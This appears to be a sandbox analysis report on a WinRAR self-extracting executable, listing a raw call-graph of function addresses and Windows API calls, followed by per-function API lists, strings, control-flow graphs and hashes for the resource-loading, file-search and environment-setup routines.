24951->24973 24965 e5ac31 EnterCriticalSection 24952->24965 24955 e5c564 24961 e5c590 24955->24961 24966 e5c479 24955->24966 24956 e5c546 24974 e59087 26 API calls _abort 24956->24974 24959 e5c550 _abort 24959->24941 24975 e5c5b7 LeaveCriticalSection _abort 24961->24975 24962->24945 24963->24942 24964->24946 24965->24955 24967 e5b136 _abort 20 API calls 24966->24967 24968 e5c48b 24967->24968 24971 e5af0a 11 API calls 24968->24971 24972 e5c498 24968->24972 24969 e58dcc _free 20 API calls 24970 e5c4ea 24969->24970 24970->24955 24971->24968 24972->24969 24973->24956 24974->24959 24975->24959 24977 e4ec50 24976->24977 24978 e4086d GetModuleHandleW 24977->24978 24979 e408e7 24978->24979 24980 e40888 GetProcAddress 24978->24980 24983 e40c14 GetModuleFileNameW 24979->24983 25081 e575fb 42 API calls __vsnwprintf_l 24979->25081 24981 e408a1 24980->24981 24982 e408b9 GetProcAddress 24980->24982 24981->24982 24984 e408cb 24982->24984 24997 e40c32 24983->24997 24984->24979 24986 e40b54 24986->24983 24987 e40b5f GetModuleFileNameW CreateFileW 24986->24987 24988 e40b8f SetFilePointer 24987->24988 24989 e40c08 CloseHandle 24987->24989 24988->24989 24990 e40b9d ReadFile 24988->24990 24989->24983 24990->24989 24993 e40bbb 24990->24993 24993->24989 24995 e4081b 2 API calls 24993->24995 24994 e40c94 GetFileAttributesW 24994->24997 24998 e40cac 24994->24998 24995->24993 24996 e40c5d CompareStringW 24996->24997 24997->24994 24997->24996 24997->24998 25072 e3b146 24997->25072 25075 e4081b 24997->25075 24999 e40cb7 24998->24999 25002 e40cec 24998->25002 25001 e40cd0 GetFileAttributesW 24999->25001 25003 e40ce8 24999->25003 25000 e40dfb 25024 e4a64d GetCurrentDirectoryW 25000->25024 25001->24999 25001->25003 25002->25000 25004 e3b146 GetVersionExW 25002->25004 25003->25002 25005 e40d06 25004->25005 25006 e40d73 25005->25006 25007 e40d0d 25005->25007 25008 e34092 _swprintf 51 API calls 25006->25008 25009 e4081b 2 API calls 25007->25009 25010 e40d9b AllocConsole 25008->25010 25011 e40d17 25009->25011 25012 e40df3 ExitProcess 25010->25012 25013 e40da8 GetCurrentProcessId AttachConsole 25010->25013 25014 e4081b 2 API calls 25011->25014 25082 e53e13 25013->25082 25015 e40d21 25014->25015 25017 e3e617 53 API calls 25015->25017 25019 e40d3c 25017->25019 25018 e40dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25018->25012 25020 e34092 _swprintf 51 API calls 25019->25020 25021 e40d4f 25020->25021 25022 e3e617 53 API calls 25021->25022 25023 e40d5e 25022->25023 25023->25012 25024->24824 25026 e4081b 2 API calls 25025->25026 25027 e4ac2a OleInitialize 25026->25027 25028 e4ac4d GdiplusStartup SHGetMalloc 25027->25028 25028->24826 25031 e4c5ce 25029->25031 25030 e4c6e4 25030->24835 25030->24836 25031->25030 25032 e41fac CharUpperW 25031->25032 25084 e3f3fa 82 API calls 2 library calls 25031->25084 25032->25031 25035 e4ec50 25034->25035 25036 e4dbeb SetEnvironmentVariableW 25035->25036 25038 e4dc0e 25036->25038 25037 e4dc36 25037->24828 25038->25037 25039 e4dc2a SetEnvironmentVariableW 25038->25039 25039->25037 25041 e4b6fe 25040->25041 25042 e4b70b GetObjectW 25040->25042 25085 e4a6c2 FindResourceW 25041->25085 25044 e4b71a 25042->25044 25046 e4a5c6 4 API calls 25044->25046 25047 e4b72d 25046->25047 25048 e4b770 25047->25048 25049 e4b74c 25047->25049 25050 e4a6c2 12 API calls 25047->25050 25059 e3da42 25048->25059 25099 e4a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25049->25099 25052 e4b73d 25050->25052 25052->25049 25054 e4b743 DeleteObject 25052->25054 25053 e4b754 25100 e4a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25053->25100 25054->25049 25056 e4b75d 25101 e4a80c 8 API calls 25056->25101 25058 e4b764 DeleteObject 25058->25048 25110 e3da67 25059->25110 25064 e490b7 25065 e4eb38 8 API calls 25064->25065 25066 e490d6 25065->25066 25066->24848 25068 e4acab GdiplusShutdown CoUninitialize 25067->25068 25068->24864 25070->24855 25071->24862 25073 e3b196 25072->25073 25074 e3b15a GetVersionExW 25072->25074 25073->24997 25074->25073 25076 e4ec50 25075->25076 25077 e40828 GetSystemDirectoryW 25076->25077 25078 e4085e 25077->25078 25079 e40840 25077->25079 25078->24997 25080 e40851 LoadLibraryW 25079->25080 25080->25078 25081->24986 25083 e53e1b 25082->25083 25083->25018 25083->25083 25084->25031 25086 e4a6e5 SizeofResource 25085->25086 25087 e4a7d3 25085->25087 25086->25087 25088 e4a6fc LoadResource 25086->25088 25087->25042 25087->25044 25088->25087 25089 e4a711 LockResource 25088->25089 25089->25087 25090 e4a722 GlobalAlloc 25089->25090 25090->25087 25091 e4a73d GlobalLock 25090->25091 25092 e4a7cc GlobalFree 25091->25092 25093 e4a74c __InternalCxxFrameHandler 25091->25093 25092->25087 25094 e4a7c5 GlobalUnlock 25093->25094 25102 e4a626 GdipAlloc 25093->25102 25094->25092 25097 e4a7b0 25097->25094 25098 e4a79a GdipCreateHBITMAPFromBitmap 25098->25097 25099->25053 25100->25056 25101->25058 25103 e4a645 25102->25103 25104 e4a638 25102->25104 25103->25094 25103->25097 25103->25098 25106 e4a3b9 25104->25106 25107 e4a3e1 GdipCreateBitmapFromStream 25106->25107 25108 e4a3da GdipCreateBitmapFromStreamICM 25106->25108 25109 e4a3e6 25107->25109 25108->25109 25109->25103 25111 e3da75 _wcschr __EH_prolog 25110->25111 25112 e3daa4 GetModuleFileNameW 25111->25112 25113 e3dad5 25111->25113 25114 e3dabe 25112->25114 25156 e398e0 25113->25156 25114->25113 25116 e3db31 25167 e56310 25116->25167 25117 e3959a 80 API calls 25119 e3da4e 25117->25119 25118 e3e261 78 API calls 25121 e3db05 25118->25121 25154 e3e29e GetModuleHandleW FindResourceW 25119->25154 25121->25116 25121->25118 25134 e3dd4a 25121->25134 25122 e3db44 25123 e56310 26 API calls 25122->25123 25131 e3db56 ___vcrt_FlsFree 25123->25131 25124 e3dc85 25124->25134 25187 e39d70 81 API calls 25124->25187 25125 e39e80 79 API calls 25125->25131 25128 e3dc9f ___std_exception_copy 25129 e39bd0 82 API calls 25128->25129 25128->25134 25132 e3dcc8 ___std_exception_copy 25129->25132 25131->25124 25131->25125 25131->25134 25181 e39bd0 25131->25181 25186 e39d70 81 API calls 25131->25186 25132->25134 25151 e3dcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 25132->25151 25188 e41b84 MultiByteToWideChar 25132->25188 25134->25117 25135 e3e159 25141 e3e1de 25135->25141 25194 e58cce 26 API calls 2 library calls 25135->25194 25138 e3e16e 25195 e57625 26 API calls 2 library calls 25138->25195 25139 e3e1c6 25196 e3e27c 78 API calls 25139->25196 25140 e3e214 25143 e56310 26 API calls 25140->25143 25141->25140 25147 e3e261 78 API calls 25141->25147 25145 e3e22d 25143->25145 25146 e56310 26 API calls 25145->25146 25146->25134 25147->25141 25149 e41da7 WideCharToMultiByte 25149->25151 25151->25134 25151->25135 25151->25149 25189 e3e5b1 50 API calls __vsnprintf 25151->25189 25190 e56159 26 API calls 3 library calls 25151->25190 25191 e58cce 26 API calls 2 library calls 25151->25191 25192 e57625 26 API calls 2 library calls 25151->25192 25193 e3e27c 78 API calls 25151->25193 25155 e3da55 25154->25155 25155->25064 25157 e398ea 25156->25157 25158 e3994b CreateFileW 25157->25158 25159 e3996c GetLastError 25158->25159 25162 e399bb 25158->25162 25160 e3bb03 GetCurrentDirectoryW 25159->25160 25161 e3998c 25160->25161 25161->25162 25164 e39990 CreateFileW GetLastError 25161->25164 25163 e399ff 25162->25163 25165 e399e5 SetFileTime 25162->25165 25163->25121 25164->25162 25166 e399b5 25164->25166 25165->25163 25166->25162 25168 e56349 25167->25168 25169 e5634d 25168->25169 25180 e56375 25168->25180 25197 e591a8 20 API calls _abort 25169->25197 25171 e56352 25198 e59087 26 API calls _abort 25171->25198 25172 e56699 25174 e4fbbc CatchGuardHandler 5 API calls 25172->25174 25176 e566a6 25174->25176 25175 e5635d 25177 e4fbbc CatchGuardHandler 5 API calls 25175->25177 25176->25122 25178 e56369 25177->25178 25178->25122 25180->25172 25199 e56230 5 API calls CatchGuardHandler 25180->25199 25182 e39be3 25181->25182 25183 e39bdc 25181->25183 25182->25183 25185 e39785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25182->25185 25200 e36d1a 77 API calls 25182->25200 25183->25131 25185->25182 25186->25131 25187->25128 25188->25151 25189->25151 25190->25151 25191->25151 25192->25151 25193->25151 25194->25138 25195->25139 25196->25141 25197->25171 25198->25175 25199->25180 25200->25182 25202 e57ce1 _abort 25201->25202 25203 e57ce8 25202->25203 25204 e57cfa 25202->25204 25237 e57e2f GetModuleHandleW 25203->25237 25225 e5ac31 EnterCriticalSection 25204->25225 25207 e57ced 25207->25204 25238 e57e73 GetModuleHandleExW 25207->25238 25208 e57d9f 25226 e57ddf 25208->25226 25211 e57d01 25211->25208 25213 e57d76 25211->25213 25246 e587e0 20 API calls _abort 25211->25246 25215 e57d8e 25213->25215 25219 e58a91 _abort 5 API calls 25213->25219 25220 e58a91 _abort 5 API calls 25215->25220 25216 e57dbc 25229 e57dee 25216->25229 25217 e57de8 25247 e62390 5 API calls CatchGuardHandler 25217->25247 25219->25215 25220->25208 25225->25211 25248 e5ac81 LeaveCriticalSection 25226->25248 25228 e57db8 25228->25216 25228->25217 25249 e5b076 25229->25249 25232 e57e1c 25235 e57e73 _abort 8 API calls 25232->25235 25233 e57dfc GetPEB 25233->25232 25234 e57e0c GetCurrentProcess TerminateProcess 25233->25234 25234->25232 25236 e57e24 ExitProcess 25235->25236 25237->25207 25239 e57ec0 25238->25239 25240 e57e9d GetProcAddress 25238->25240 25241 e57ec6 FreeLibrary 25239->25241 25242 e57ecf 25239->25242 25243 e57eb2 25240->25243 25241->25242 25244 e4fbbc CatchGuardHandler 5 API calls 25242->25244 25243->25239 25245 e57cf9 25244->25245 25245->25204 25246->25213 25248->25228 25250 e5b09b 25249->25250 25254 e5b091 25249->25254 25251 e5ac98 _abort 5 API calls 25250->25251 25251->25254 25252 e4fbbc CatchGuardHandler 5 API calls 25253 e57df8 25252->25253 25253->25232 25253->25233 25254->25252 25358 e41bbd GetCPInfo IsDBCSLeadByte 25340 e4c793 102 API calls 5 library calls 25318 e49580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25319 e4b18d 78 API calls 25285 e4c793 97 API calls 4 library calls 25287 e5b49d 6 API calls CatchGuardHandler 25360 e57f6e 52 API calls 2 library calls 25341 e58268 55 API calls _free 25288 e4c793 107 API calls 5 library calls 25361 e31f72 128 API calls __EH_prolog 25289 e4a070 10 API calls 25342 e4b270 99 API calls 25291 e31075 84 API calls 24512 e39a74 24516 e39a7e 24512->24516 24513 e39ab1 24514 e39b9d SetFilePointer 24514->24513 24515 e39bb6 GetLastError 24514->24515 24515->24513 24516->24513 24516->24514 24517 e3981a 79 API calls 24516->24517 24518 e39b79 24516->24518 24517->24518 24518->24514 24520 e39f7a 24521 e39f88 24520->24521 24522 e39f8f 24520->24522 24523 e39f9c GetStdHandle 24522->24523 24530 e39fab 24522->24530 24523->24530 24524 e3a003 WriteFile 24524->24530 24525 e39fd4 WriteFile 24526 e39fcf 24525->24526 24525->24530 24526->24525 24526->24530 24528 e3a095 24532 e36e98 77 API calls 24528->24532 24530->24521 24530->24524 24530->24525 24530->24526 24530->24528 24531 e36baa 78 API calls 24530->24531 24531->24530 24532->24521 25293 e4a440 GdipCloneImage GdipAlloc 25343 e53a40 5 API calls CatchGuardHandler 25363 e61f40 CloseHandle 24547 e4e44b 24548 e4e3f4 24547->24548 24548->24547 24549 e4e85d ___delayLoadHelper2@8 14 API calls 24548->24549 24549->24548 25295 e4e455 14 API calls ___delayLoadHelper2@8 24571 e4cd58 24572 e4ce22 24571->24572 24579 e4cd7b _wcschr 24571->24579 24581 e4c793 _wcslen _wcsrchr 24572->24581 24599 e4d78f 24572->24599 24573 e4b314 ExpandEnvironmentStringsW 24573->24581 24575 e4d40a 24577 e41fbb CompareStringW 24577->24579 24578 e4ca67 SetWindowTextW 24578->24581 24579->24572 24579->24577 24581->24573 24581->24575 24581->24578 24583 e53e3e 22 API calls 24581->24583 24585 e4c855 SetFileAttributesW 24581->24585 24590 e4cc31 GetDlgItem SetWindowTextW SendMessageW 24581->24590 24593 e4cc71 SendMessageW 24581->24593 24598 e41fbb CompareStringW 24581->24598 24621 e4a64d GetCurrentDirectoryW 24581->24621 24623 e3a5d1 6 API calls 24581->24623 24624 e3a55a FindClose 24581->24624 24625 e4b48e 76 API calls 2 library calls 24581->24625 24583->24581 24586 e4c90f GetFileAttributesW 24585->24586 24597 e4c86f __cftof _wcslen 24585->24597 24586->24581 24589 e4c921 DeleteFileW 24586->24589 24589->24581 24591 e4c932 24589->24591 24590->24581 24592 e34092 _swprintf 51 API calls 24591->24592 24594 e4c952 GetFileAttributesW 24592->24594 24593->24581 24594->24591 24595 e4c967 MoveFileW 24594->24595 24595->24581 24596 e4c97f MoveFileExW 24595->24596 24596->24581 24597->24581 24597->24586 24622 e3b991 51 API calls 3 library calls 24597->24622 24598->24581 24600 e4d799 __cftof _wcslen 24599->24600 24601 e4d8a5 24600->24601 24604 e4d9e7 24600->24604 24605 e4d9c0 24600->24605 24626 e41fbb CompareStringW 24600->24626 24603 e3a231 3 API calls 24601->24603 24606 e4d8ba 24603->24606 24604->24581 24605->24604 24607 e4d9de ShowWindow 24605->24607 24609 e4d8d1 24606->24609 24627 e3b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24606->24627 24607->24604 24609->24604 24610 e4d925 24609->24610 24611 e4d97b CloseHandle 24609->24611 24615 e4d91b ShowWindow 24609->24615 24628 e4dc3b 6 API calls 24610->24628 24612 e4d994 24611->24612 24613 e4d989 24611->24613 24612->24605 24629 e41fbb CompareStringW 24613->24629 24615->24610 24617 e4d93d 24617->24611 24618 e4d950 GetExitCodeProcess 24617->24618 24618->24611 24619 e4d963 24618->24619 24619->24611 24621->24581 24622->24597 24623->24581 24624->24581 24625->24581 24626->24601 24627->24609 24628->24617 24629->24612 25296 e5f421 21 API calls __vsnwprintf_l 25345 e4c220 93 API calls _swprintf 25298 e31025 29 API calls 25325 e5b4ae 27 API calls CatchGuardHandler 25326 e4f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25366 e4ff30 LocalFree 24640 e5bb30 24641 e5bb39 24640->24641 24643 e5bb42 24640->24643 24644 e5ba27 24641->24644 24645 e597e5 _abort 38 API calls 24644->24645 24646 e5ba34 24645->24646 24664 e5bb4e 24646->24664 24648 e5ba3c 24673 e5b7bb 24648->24673 24651 e5ba53 24651->24643 24652 e58e06 __vsnwprintf_l 21 API calls 24653 e5ba64 24652->24653 24654 e5ba96 24653->24654 24680 e5bbf0 24653->24680 24657 e58dcc _free 20 API calls 24654->24657 24657->24651 24658 e5ba91 24690 e591a8 20 API calls _abort 24658->24690 24660 e5bada 24660->24654 24691 e5b691 26 API calls 24660->24691 24661 e5baae 24661->24660 24662 e58dcc _free 20 API calls 24661->24662 24662->24660 24665 e5bb5a __FrameHandler3::FrameUnwindToState 24664->24665 24666 e597e5 _abort 38 API calls 24665->24666 24668 e5bb64 24666->24668 24670 e5bbe8 _abort 24668->24670 24672 e58dcc _free 20 API calls 24668->24672 24692 e58d24 38 API calls _abort 24668->24692 24693 e5ac31 EnterCriticalSection 24668->24693 24694 e5bbdf LeaveCriticalSection _abort 24668->24694 24670->24648 24672->24668 24674 e54636 __cftof 38 API calls 24673->24674 24675 e5b7cd 24674->24675 24676 e5b7dc GetOEMCP 24675->24676 24677 e5b7ee 24675->24677 24678 e5b805 24676->24678 24677->24678 24679 e5b7f3 GetACP 24677->24679 24678->24651 24678->24652 24679->24678 24681 e5b7bb 40 API calls 24680->24681 24682 e5bc0f 24681->24682 24685 e5bc60 IsValidCodePage 24682->24685 24687 e5bc16 24682->24687 24689 e5bc85 __cftof 24682->24689 24683 e4fbbc CatchGuardHandler 5 API calls 24684 e5ba89 24683->24684 24684->24658 24684->24661 24686 e5bc72 GetCPInfo 24685->24686 24685->24687 24686->24687 24686->24689 24687->24683 24695 e5b893 GetCPInfo 24689->24695 24690->24654 24691->24654 24693->24668 24694->24668 24701 e5b8cd 24695->24701 24704 e5b977 24695->24704 24698 e4fbbc CatchGuardHandler 5 API calls 24700 e5ba23 24698->24700 24700->24687 24705 e5c988 24701->24705 24703 e5ab78 __vsnwprintf_l 43 API calls 24703->24704 24704->24698 24706 e54636 __cftof 38 API calls 24705->24706 24707 e5c9a8 MultiByteToWideChar 24706->24707 24709 e5c9e6 24707->24709 24710 e5ca7e 24707->24710 24712 e58e06 __vsnwprintf_l 21 API calls 24709->24712 24715 e5ca07 __cftof __vsnwprintf_l 24709->24715 24711 e4fbbc CatchGuardHandler 5 API calls 24710->24711 24713 e5b92e 24711->24713 24712->24715 24719 e5ab78 24713->24719 24714 e5ca78 24724 e5abc3 20 API calls _free 24714->24724 24715->24714 24717 e5ca4c MultiByteToWideChar 24715->24717 24717->24714 24718 e5ca68 GetStringTypeW 24717->24718 24718->24714 24720 e54636 __cftof 38 API calls 24719->24720 24721 e5ab8b 24720->24721 24725 e5a95b 24721->24725 24724->24710 24726 e5a976 __vsnwprintf_l 24725->24726 24727 e5a99c MultiByteToWideChar 24726->24727 24728 e5a9c6 24727->24728 24729 e5ab50 24727->24729 24733 e58e06 __vsnwprintf_l 21 API calls 24728->24733 24734 e5a9e7 __vsnwprintf_l 24728->24734 24730 e4fbbc CatchGuardHandler 5 API calls 24729->24730 24731 e5ab63 24730->24731 24731->24703 24732 e5aa30 MultiByteToWideChar 24735 e5aa49 24732->24735 24747 e5aa9c 24732->24747 24733->24734 24734->24732 24734->24747 24752 e5af6c 24735->24752 24739 e5aa73 24743 e5af6c __vsnwprintf_l 11 API calls 24739->24743 24739->24747 24740 e5aaab 24741 e58e06 __vsnwprintf_l 21 API calls 24740->24741 24745 e5aacc __vsnwprintf_l 24740->24745 24741->24745 24742 e5ab41 24760 e5abc3 20 API calls _free 24742->24760 24743->24747 24745->24742 24746 e5af6c __vsnwprintf_l 11 API calls 24745->24746 24748 e5ab20 24746->24748 24761 e5abc3 20 API calls _free 24747->24761 24748->24742 24749 e5ab2f WideCharToMultiByte 24748->24749 24749->24742 24750 e5ab6f 24749->24750 24762 e5abc3 20 API calls _free 24750->24762 24753 e5ac98 _abort 5 API calls 24752->24753 24754 e5af93 24753->24754 24757 e5af9c 24754->24757 24763 e5aff4 10 API calls 3 library calls 24754->24763 24756 e5afdc LCMapStringW 24756->24757 24758 e4fbbc CatchGuardHandler 5 API calls 24757->24758 24759 e5aa60 24758->24759 24759->24739 24759->24740 24759->24747 24760->24747 24761->24729 24762->24747 24763->24756 25301 e5c030 GetProcessHeap 25302 e4a400 GdipDisposeImage GdipFree 25346 e4d600 70 API calls 25303 e56000 QueryPerformanceFrequency QueryPerformanceCounter 25329 e52900 6 API calls 4 library calls 25347 e5f200 51 API calls 25368 e5a700 21 API calls 25369 e31710 86 API calls 25332 e4ad10 73 API calls

                                                                                                                    Executed Functions

                                                                                                                    Function 00E4DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E40863: GetModuleHandleW.KERNEL32(kernel32), ref: 00E4087C
                                                                                                                      • Part of subcall function 00E40863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E4088E
                                                                                                                      • Part of subcall function 00E40863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E408BF
                                                                                                                      • Part of subcall function 00E4A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00E4A655
                                                                                                                      • Part of subcall function 00E4AC16: OleInitialize.OLE32(00000000), ref: 00E4AC2F
                                                                                                                      • Part of subcall function 00E4AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E4AC66
                                                                                                                      • Part of subcall function 00E4AC16: SHGetMalloc.SHELL32(00E78438), ref: 00E4AC70
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00E4DF5C
                                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00E4DF83
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00E4DF94
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00E4DFCE
                                                                                                                      • Part of subcall function 00E4DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00E4DBF4
                                                                                                                      • Part of subcall function 00E4DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E4DC30
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E4DFD7
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00E8EC90,00000800), ref: 00E4DFF2
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,00E8EC90), ref: 00E4DFFE
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00E4E009
                                                                                                                    • _swprintf.LIBCMT ref: 00E4E048
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00E4E05A
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00E4E061
                                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 00E4E078
                                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00E4E0C9
                                                                                                                    • Sleep.KERNEL32(?), ref: 00E4E0F7
                                                                                                                    • DeleteObject.GDI32 ref: 00E4E130
                                                                                                                    • DeleteObject.GDI32(?), ref: 00E4E140
                                                                                                                    • CloseHandle.KERNEL32 ref: 00E4E183
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz
                                                                                                                    • API String ID: 3049964643-271953491
                                                                                                                    • Opcode ID: c56a31e642952ec5c85e1a6b0ebf171370f4ae13ce7fd9ae907c3f5ac729e689
                                                                                                                    • Instruction ID: d85a3be16bd07ff48120842e80dc52165ec044be00fdc180c1064d33994d1a20
                                                                                                                    • Opcode Fuzzy Hash: c56a31e642952ec5c85e1a6b0ebf171370f4ae13ce7fd9ae907c3f5ac729e689
                                                                                                                    • Instruction Fuzzy Hash: DC610671A48304AFC320AB76BC49F2B77EDBB45744F00242AF949B2392DAB4D94CC761
                                                                                                                    Function 00E4A6C2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100memorywindowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 802 e4a6c2-e4a6df FindResourceW 803 e4a6e5-e4a6f6 SizeofResource 802->803 804 e4a7db 802->804 803->804 805 e4a6fc-e4a70b LoadResource 803->805 806 e4a7dd-e4a7e1 804->806 805->804 807 e4a711-e4a71c LockResource 805->807 807->804 808 e4a722-e4a737 GlobalAlloc 807->808 809 e4a7d3-e4a7d9 808->809 810 e4a73d-e4a746 GlobalLock 808->810 809->806 811 e4a7cc-e4a7cd GlobalFree 810->811 812 e4a74c-e4a76a call e50320 810->812 811->809 816 e4a7c5-e4a7c6 GlobalUnlock 812->816 817 e4a76c-e4a78e call e4a626 812->817 816->811 817->816 822 e4a790-e4a798 817->822 823 e4a7b3-e4a7c1 822->823 824 e4a79a-e4a7ae GdipCreateHBITMAPFromBitmap 822->824 823->816 824->823 825 e4a7b0 824->825 825->823
                                                                                                                    APIs
                                                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E4B73D,00000066), ref: 00E4A6D5
                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,00E4B73D,00000066), ref: 00E4A6EC
                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,00E4B73D,00000066), ref: 00E4A703
                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,00E4B73D,00000066), ref: 00E4A712
                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00E4B73D,00000066), ref: 00E4A72D
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00E4A73E
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E4A762
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00E4A7C6
                                                                                                                      • Part of subcall function 00E4A626: GdipAlloc.GDIPLUS(00000010), ref: 00E4A62C
                                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E4A7A7
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00E4A7CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                    • String ID: Fjun$PNG
                                                                                                                    • API String ID: 211097158-1136719808
                                                                                                                    • Opcode ID: 1603f1ca4221d2bebb9b23556870b03625dddb5dd48e5205e0d7d0c9df2ac3b4
                                                                                                                    • Instruction ID: 453f16b8621075398d17f6187471999f274d5c0dc37bf4890de93eedbd9413ec
                                                                                                                    • Opcode Fuzzy Hash: 1603f1ca4221d2bebb9b23556870b03625dddb5dd48e5205e0d7d0c9df2ac3b4
                                                                                                                    • Instruction Fuzzy Hash: C4318475541302AFD7209F32FC4CD1BBBB9EF857A4B04152AF805F2660EB71DD489A51
                                                                                                                    Function 00E3A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1032 e3a69b-e3a6bf call e4ec50 1035 e3a6c1-e3a6ce FindFirstFileW 1032->1035 1036 e3a727-e3a730 FindNextFileW 1032->1036 1037 e3a742-e3a7ff call e40602 call e3c310 call e415da * 3 1035->1037 1039 e3a6d0-e3a6e2 call e3bb03 1035->1039 1036->1037 1038 e3a732-e3a740 GetLastError 1036->1038 1043 e3a804-e3a811 1037->1043 1040 e3a719-e3a722 1038->1040 1046 e3a6e4-e3a6fc FindFirstFileW 1039->1046 1047 e3a6fe-e3a707 GetLastError 1039->1047 1040->1043 1046->1037 1046->1047 1049 e3a717 1047->1049 1050 e3a709-e3a70c 1047->1050 1049->1040 1050->1049 1052 e3a70e-e3a711 1050->1052 1052->1049 1054 e3a713-e3a715 1052->1054 1054->1040
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A6C4
                                                                                                                      • Part of subcall function 00E3BB03: _wcslen.LIBCMT ref: 00E3BB27
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A6F2
                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A6FE
